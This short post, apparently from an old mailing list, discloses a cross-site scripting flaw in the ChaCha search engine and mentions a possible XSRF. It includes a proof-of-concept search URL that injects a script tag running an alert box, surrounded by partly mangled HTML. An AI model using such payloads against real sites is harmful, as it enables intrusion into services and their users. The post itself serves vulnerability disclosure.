There is an XSS vulnerability in the Chacha search engine - possible XSRF as well.<br><br><a href="http://search.chacha.com/search/query?query=%27" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://search.chacha.com/search/query?query=&#39;
</a>&lt;script&gt;alert(&#39;xss&#39;)&lt;/script<div id="mb_0">&gt;mode=web&amp;wsid=6661f6c2-b53a-666a-666e-dd666e666dda</div>